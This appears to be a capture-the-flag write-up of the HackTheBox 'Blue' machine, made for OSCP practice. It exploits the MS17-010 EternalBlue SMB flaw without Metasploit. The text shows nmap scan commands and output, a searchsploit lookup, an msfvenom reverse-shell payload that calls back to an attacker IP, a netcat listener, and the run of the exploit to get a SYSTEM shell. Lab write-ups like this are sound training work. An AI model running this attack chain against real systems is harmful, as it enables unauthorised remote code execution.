Blue is the third hackthebox machine i have completed but is the first time without using metasploit. This machine exploits SMB using the famous SMB MS17-010 vulnerability Eternal Blue.
Summary
- Port Scan using Nmap
- Searchsploit MS17-010 non-metasploit exploits
- msfvenom to create a non-meterpreter shell.
- netcat listener
Machine IP: 10.10.10.40
Recon and Information Gathering
Port Scan with Nmap
As always, we first begin with a simple nmap port scan to discover any open ports on this machine.
nmap -n -sV -p- -T 5 -Pn 10.10.10.40
PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP) 49152/tcp open msrpc Microsoft Windows RPC 49153/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Windows RPC 49155/tcp open msrpc Microsoft Windows RPC 49156/tcp open msrpc Microsoft Windows RPC 49157/tcp open msrpc Microsoft Windows RPC 52097/tcp filtered unknown
we can see ports 135, 139 and 445 are open. As well as 6 ports for msrpc.
SMB
As we have SMB on port 445, lets enumerate further.
nmap -n -A -p 445 -T 5 -Pn 10.10.10.40
PORT STATE SERVICE VERSION 445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP) Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: -13m39s, deviation: 34m35s, median: 6m17s | smb-os-discovery: | OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1) | OS CPE: cpe:/o:microsoft:windows_7::sp1:professional | Computer name: haris-PC | NetBIOS computer name: HARIS-PC\x00 | Workgroup: WORKGROUP\x00 |_ System time: 2020-09-14T21:54:17+01:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2020-09-14T20:54:16 |_ start_date: 2020-09-14T20:16:58
Knowing this could be exploitable, lets run Nmaps SMB vulnerability scanner against the port 445.
nmap --script=*vuln-smb* -p 445 10.10.10.40
Host script results: |_smb-vuln-ms10-054: false |_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND | smb-vuln-ms17-010: | VULNERABLE: | Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010) | State: VULNERABLE | IDs: CVE:CVE-2017-0143 | Risk factor: HIGH | A critical remote code execution vulnerability exists in Microsoft SMBv1 | servers (ms17-010).
This machine is vulnerable to Eternal Blue, which means remote code execution!
Exploiting without Metasploit
Lets use searchsploit to find find a non-metasploit exploit in the database.
searchsploit --id MS17-010
kali@kali:~$ searchsploit --id ms17-010 ------------------------------------------------------------------------------------------------------------------ --------------------------------- Exploit Title | EDB-ID ------------------------------------------------------------------------------------------------------------------ --------------------------------- Microsoft Windows - 'EternalRomance'/'EternalSynergy'/'EternalChampion' SMB Remote Code Execution (Metasploit) (M | 43970 Microsoft Windows - SMB Remote Code Execution Scanner (MS17-010) (Metasploit) | 41891 Microsoft Windows 7/2008 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010) | 42031 Microsoft Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010) | 42315 Microsoft Windows 8/8.1/2012 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010) | 42030 Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010) | 41987 ------------------------------------------------------------------------------------------------------------------ --------------------------------- Shellcodes: No Results
The machine is running Windows 7, so lets go ahead and use #42315 by cloning it to our working directory using searchsploit -m 42315 and then examining the source code.
The source code requires three things:
- Download mysmb.py
- Using MSFVenom to generate a reverse shell payload. This is indicated by:
Note: there are many methods to get shell over SMB admin session. a simple method to get shell (but easily to be detected by AV) is executing binary generated by "msfvenom -f exe-service ..."`
- If possible, provide login credentials and point to the msfvenom payload.
Preparing
First thing to do is clone the github repositoryand then rename it:
wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42315.py mv 42315.py.1 mysmb.py
Next, create the msfvenom reverse shell executable payload.
msfvenom -p windows/shell_reverse_tcp -f exe LHOST=10.10.14.27 LPORT=4444 > eternal-blue.exe
Lastly, as seen in our Nmap scan earlier, SMB supports the user ‘guest’, so enter the guest credentials into the exploit
Also we’ll add the executable’s location to the exploit file to send it and execute it.
And lastly, I will set up a netcat listener on my host machine.
nc -nvlp 4444
Exploiting
Run the python script python 42315.py 10.10.10.40 and check the netcat listener.
We have shell with system access!
User
Root
End Notes
I did have some issues when exploiting this machine, but this was due to my own silly errors, such as missing out an ‘ in service_exec() and putting the file location as /root/.
This is the first machine i have completed without using metasploit, due to the OSCP not allowing it, likewise msfvenom was used due to meterpretor not being allowed either.